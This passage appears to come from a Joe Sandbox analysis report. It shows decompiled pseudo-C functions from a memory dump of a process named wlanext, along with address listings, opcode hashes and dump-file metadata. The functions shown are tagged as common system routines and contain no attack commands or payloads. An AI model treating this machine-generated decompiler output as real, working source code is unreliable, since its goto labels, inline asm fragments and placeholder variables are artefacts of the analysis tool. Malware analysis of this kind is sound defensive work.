						E0352F3E0(_t50,  *0x35d7b14, _t8 >> 3);
						_t28 =  *0x35d7b14; // 0x771c7b0c
						__eflags = _t28 - 0x35d7b0c;
						if(_t28 != 0x35d7b0c) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x35d7b14 = _t50;
						_t48 = _v12;
						 *0x35d7b10 = _t9;
						goto L6;
					}
					 *0x35d7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                  0x0351a713
                                  0x0351a714
                                  0x0351a717
                                  0x0351a71d
                                  0x0351a720
                                  0x0351a722
                                  0x0351a727
                                  0x0351a74a
                                  0x0351a754
                                  0x0351a75e
                                  0x0351a768
                                  0x0351a76a
                                  0x0351a773
                                  0x0351a78b
                                  0x0351a790
                                  0x0351a792
                                  0x0351a741
                                  0x0351a741
                                  0x0351a743
                                  0x0351a749
                                  0x0351a749
                                  0x0351a732
                                  0x0351a73a
                                  0x0351a797
                                  0x0351a79d
                                  0x0351a7a3
                                  0x0351a7a9
                                  0x0351a7b6
                                  0x0351a7bc
                                  0x0351a7ca
                                  0x0351a7e0
                                  0x0351a7e2
                                  0x0351a7e4
                                  0x03559bf2
                                  0x00000000
                                  0x03559bf2
                                  0x0351a7ed
                                  0x0351a7f2
                                  0x0351a800
                                  0x0351a805
                                  0x0351a80d
                                  0x0351a812
                                  0x03559c08
                                  0x03559c08
                                  0x0351a818
                                  0x0351a81b
                                  0x0351a821
                                  0x0351a824
                                  0x00000000
                                  0x0351a824
                                  0x0351a7ae
                                  0x00000000
                                  0x0351a7ae
                                  0x0351a73c
                                  0x0351a73e
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49efc23393ec764ec60ea6f1ffc816fd4fc7a13c5539debc6647e21ed3406a00
                                  • Instruction ID: efed06f1713b56f34570d119a9c9bf72c7abba7ddf5d50f657eeda8f744eb717
                                  • Opcode Fuzzy Hash: 49efc23393ec764ec60ea6f1ffc816fd4fc7a13c5539debc6647e21ed3406a00
                                  • Instruction Fuzzy Hash: 4E31D4B1603201DFF722DF18F880F29B7F9FB89710F14095AE85587264E370AA26DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EAA16 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E034EAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x35dd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x35d7b9c; // 0x0
					_t53 = L03504620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0352B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0352F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L034F6C59(_t53, _t51, _t58) != 0) {
							_t28 = E03515E50(0x34cc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0351B230(_v32, _v28, 0x34cc2d8, 1,  &_v24);
								_t28 = E034EF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                  0x034eaa25
                                  0x034eaa29
                                  0x034eaa2d
                                  0x034eaa30
                                  0x034eaa37
                                  0x034eaa3c
                                  0x03544458
                                  0x03544458
                                  0x03544472
                                  0x03544474
                                  0x03544476
                                  0x034eaa64
                                  0x034eaa74
                                  0x0354447c
                                  0x03544483
                                  0x03544492
                                  0x034eaa52
                                  0x034eaa54
                                  0x034eaa5e
                                  0x035444a8
                                  0x035444ad
                                  0x035444af
                                  0x035444b6
                                  0x035444b6
                                  0x035444b9
                                  0x035444bc
                                  0x035444cd
                                  0x035444d3
                                  0x035444d6
                                  0x035444e1
                                  0x035444e1
                                  0x035444e6
                                  0x035444e8
                                  0x035444fb
                                  0x035444fb
                                  0x035444e8
                                  0x00000000
                                  0x034eaa5e
                                  0x03544476
                                  0x034eaa42
                                  0x034eaa46
                                  0x034eaa48
                                  0x034eaa4c
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f4b4a5f0b9599fa589234cbaa455c266a015dd4bf929241f05deb1fc4e99576
                                  • Instruction ID: 346f705fa79764fadf37b78e74c60adfb72f344fe0ee798dc8bddb5d2ea4ff2b
                                  • Opcode Fuzzy Hash: 4f4b4a5f0b9599fa589234cbaa455c266a015dd4bf929241f05deb1fc4e99576
                                  • Instruction Fuzzy Hash: 9B3121B1A00219ABCB10EF65ED81A7FB7B8FF48700B04046AF901EB260E7349D11CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035161A0 Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E035161A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03515E50(0x34c67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E035B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E034EF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                  0x035161b3
                                  0x035161b5
                                  0x035161bd
                                  0x035161c3
                                  0x035161c7
                                  0x035161d2
                                  0x035161ff
                                  0x035161ff
                                  0x03516201
                                  0x03516207
                                  0x03516207
                                  0x035161d4
                                  0x035161d9
                                  0x00000000
                                  0x00000000
                                  0x035161df
                                  0x035161e2
                                  0x00000000
                                  0x00000000
                                  0x035161e6
                                  0x035161e8
                                  0x035161ee
                                  0x035161ee
                                  0x035161f9
                                  0x0355762f
                                  0x03557632
                                  0x03557635
                                  0x03557639
                                  0x03557640
                                  0x0355766e
                                  0x03557675
                                  0x00000000
                                  0x00000000
                                  0x03557681
                                  0x03557689
                                  0x0355768d
                                  0x03557691
                                  0x03557695
                                  0x03557699
                                  0x035576af
                                  0x035576b5
                                  0x035576b7
                                  0x035576b7
                                  0x035576d7
                                  0x035576dc
                                  0x00000000
                                  0x035576dc
                                  0x035576a2
                                  0x035576a9
                                  0x03557651
                                  0x03557653
                                  0x03557653
                                  0x03557656
                                  0x03557656
                                  0x00000000
                                  0x03557656
                                  0x03557644
                                  0x03557646
                                  0x03557648
                                  0x03557648
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 553c10485c756467116b2a9c1661a5d89bddf07564e94bf8500d4dfd28fbb782
                                  • Instruction ID: 0a79efbc266fcdb49c57a120351ebbf0bc563eb941970c52c9b2386dc19e772b
                                  • Opcode Fuzzy Hash: 553c10485c756467116b2a9c1661a5d89bddf07564e94bf8500d4dfd28fbb782
                                  • Instruction Fuzzy Hash: F6317A716053018FE360CF09D810B26F7E4FB88B00F1949AEFC989B261E774E804CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03524A2C Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E03524A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x35dd360 ^ _t62;
				_v8 =  *0x35dd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03502280(_t26, 0x35d8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E034FFFB0(_t41, _t51, 0x35d8608);
						L2:
						 *0x35db1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0352B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03502280(_t28, 0x35d8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E034FFFB0(_t42, _t53, 0x35d8608);
							if(_t53 != 0) {
								L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E034FFFB0(_t41, _t51, 0x35d8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                  0x03524a2c
                                  0x03524a34
                                  0x03524a3c
                                  0x03524a3e
                                  0x03524a48
                                  0x03524a4b
                                  0x03524a4d
                                  0x03524a51
                                  0x03524a9c
                                  0x00000000
                                  0x00000000
                                  0x03524aa3
                                  0x03524aa8
                                  0x03524aad
                                  0x03524ab1
                                  0x03524ade
                                  0x03524ae3
                                  0x03524a5a
                                  0x03524a62
                                  0x03524a6a
                                  0x03524a6e
                                  0x0355f203
                                  0x03524a84
                                  0x03524a88
                                  0x03524a89
                                  0x03524a8a
                                  0x03524a95
                                  0x03524a95
                                  0x03524a79
                                  0x03524a80
                                  0x03524af2
                                  0x03524af4
                                  0x03524af9
                                  0x03524aff
                                  0x03524b01
                                  0x03524b03
                                  0x03524b08
                                  0x0355f20a
                                  0x0355f212
                                  0x0355f216
                                  0x0355f216
                                  0x03524b08
                                  0x03524b13
                                  0x03524b1a
                                  0x0355f229
                                  0x0355f229
                                  0x03524b1a
                                  0x03524a82
                                  0x00000000
                                  0x03524a82
                                  0x03524ab7
                                  0x03524acd
                                  0x03524acd
                                  0x03524ad5
                                  0x03524ada
                                  0x00000000
                                  0x03524ada
                                  0x03524ac2
                                  0x03524acb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03524acb
                                  0x03524a53
                                  0x03524a53
                                  0x03524a58
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b880d45056a160ece2a299a711ef6595bcef7f39a44857dcbdc6ff00ce2e303b
                                  • Instruction ID: 5eb15a72bfd0109bbeab81accda6b13c446dc5f182d1c95ddf1d6e7f5bcd6f42
                                  • Opcode Fuzzy Hash: b880d45056a160ece2a299a711ef6595bcef7f39a44857dcbdc6ff00ce2e303b
                                  • Instruction Fuzzy Hash: 9D313776201361DFC731DF56E945B2ABBA5FFC2710F09045AE8120B2B0C770E844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03528EC7 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E03528EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x35dd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03514E70(0x35d86e4, 0x3529490, 0, 0);
					if( *0x35d53e8 > 5 && E03528F33(0x35d53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x35d53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x35d53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x34cbc46;
						_t48 = E03567B9C(0x35d53e8, 0x34cbc46, _t67, 0x35d53e8, _t70,  &_v140);
					}
				}
				return E0352B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                  0x03528ec7
                                  0x03528ed9
                                  0x03528edc
                                  0x03528ee6
                                  0x03528ee9
                                  0x03528eee
                                  0x03528efc
                                  0x03528f08
                                  0x03561349
                                  0x03561353
                                  0x0356135d
                                  0x03561366
                                  0x0356136f
                                  0x03561375
                                  0x0356137c
                                  0x03561385
                                  0x03561390
                                  0x03561391
                                  0x0356139c
                                  0x0356139d
                                  0x035613a6
                                  0x035613ac
                                  0x035613b2
                                  0x035613b5
                                  0x035613bc
                                  0x035613bf
                                  0x035613c2
                                  0x035613c5
                                  0x035613c8
                                  0x035613cb
                                  0x035613ce
                                  0x035613d1
                                  0x035613d4
                                  0x035613d7
                                  0x035613da
                                  0x035613dd
                                  0x035613e0
                                  0x035613e3
                                  0x035613e6
                                  0x035613e9
                                  0x035613f6
                                  0x03561400
                                  0x03561400
                                  0x03528f08
                                  0x03528f32

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dee0ea581799d1c68a8dfe9279877ae22397c3f91c4659652467beab2d886412
                                  • Instruction ID: 0a23123506ced9b54cf1ab516fcb4ffe81d6bfdeb83ee81b24a7545d89c01b0c
                                  • Opcode Fuzzy Hash: dee0ea581799d1c68a8dfe9279877ae22397c3f91c4659652467beab2d886412
                                  • Instruction Fuzzy Hash: B541AFB5D003289FDB20CFAAE981AADFBF4FB49310F5041AEE519A7650E7705A84CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351E730 Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E0351E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03529670() < 0) {
					L0353DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x35d7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03504620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0351E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                  0x0351e730
                                  0x0351e736
                                  0x0351e738
                                  0x0351e73d
                                  0x0351e73e
                                  0x0351e740
                                  0x0351e749
                                  0x0351e765
                                  0x0351e76a
                                  0x0351e76b
                                  0x0351e76c
                                  0x0351e76d
                                  0x0351e76e
                                  0x0351e76f
                                  0x0351e775
                                  0x0351e777
                                  0x0351e77e
                                  0x0355b675
                                  0x0351e784
                                  0x0351e784
                                  0x0351e789
                                  0x0351e7a8
                                  0x0351e7ac
                                  0x0351e807
                                  0x0351e7ae
                                  0x0351e7ae
                                  0x0351e7b1
                                  0x0351e7b4
                                  0x0351e7b9
                                  0x0351e7c0
                                  0x0351e7c4
                                  0x0351e7ca
                                  0x0351e7cc
                                  0x00000000
                                  0x0351e7d3
                                  0x0351e7d6
                                  0x00000000
                                  0x00000000
                                  0x0351e7ff
                                  0x0351e802
                                  0x00000000
                                  0x00000000
                                  0x0351e7f9
                                  0x0351e7fc
                                  0x00000000
                                  0x00000000
                                  0x0351e7f3
                                  0x0351e7f6
                                  0x00000000
                                  0x00000000
                                  0x0351e7ed
                                  0x0351e7f0
                                  0x00000000
                                  0x00000000
                                  0x0351e7e7
                                  0x0351e7ea
                                  0x00000000
                                  0x00000000
                                  0x0355b685
                                  0x0355b688
                                  0x00000000
                                  0x00000000
                                  0x0355b682
                                  0x00000000
                                  0x00000000
                                  0x0351e7cc
                                  0x0351e7d9
                                  0x0351e7dc
                                  0x0351e7de
                                  0x0351e7de
                                  0x0351e7ac
                                  0x0351e7e4
                                  0x0351e74b
                                  0x0351e751
                                  0x0351e759
                                  0x0351e761
                                  0x0351e761

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39f2e2cf8ebb96c8445d892579396828f98693f19686fc9519ef0c1b581a3d0a
                                  • Instruction ID: 4d20dceb1f516639b72d5d09fd7a5c567b77b6cb6d5c65b129a3badac20eae1c
                                  • Opcode Fuzzy Hash: 39f2e2cf8ebb96c8445d892579396828f98693f19686fc9519ef0c1b581a3d0a
                                  • Instruction Fuzzy Hash: 02318C79A14249AFE704CF58E841F9ABBE8FB09310F148656FD04CB351E631E890CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351BC2C Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0351BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x35d6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03502280(0xd, 0x10d2f1a0);
				_t41 =  *0x35d60f8; // 0x0
				if(_t41 != 0) {
					 *0x35d60f8 =  *_t41;
					 *0x35d60fc =  *0x35d60fc + 0xffff;
				}
				E034FFFB0(_t41, 0x800, 0x10d2f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x35d60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03504620(0x35d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x35d6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                  0x0351bc36
                                  0x0351bc42
                                  0x0351bc45
                                  0x0351bc4a
                                  0x0351bd35
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0351bc50
                                  0x0351bc50
                                  0x0351bc58
                                  0x0351bc5a
                                  0x0351bc60
                                  0x00000000
                                  0x00000000
                                  0x0355a4f2
                                  0x0355a4f6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0355a4fc
                                  0x0351bc79
                                  0x0351bc7e
                                  0x0351bc86
                                  0x0351bd16
                                  0x0351bd20
                                  0x0351bd20
                                  0x0351bc8d
                                  0x0351bc94
                                  0x0351bcbd
                                  0x0351bcca
                                  0x0351bccb
                                  0x0351bccc
                                  0x0351bccd
                                  0x0351bcce
                                  0x0351bcd4
                                  0x0351bcea
                                  0x0351bcee
                                  0x0351bcf2
                                  0x0351bd00
                                  0x0351bd04
                                  0x00000000
                                  0x0351bc96
                                  0x0351bcab
                                  0x0351bcaf
                                  0x0351bd2c
                                  0x0351bd2c
                                  0x0351bd09
                                  0x00000000
                                  0x0351bd09
                                  0x0351bcb1
                                  0x0351bcb5
                                  0x0351bcbb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0351bcbb

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
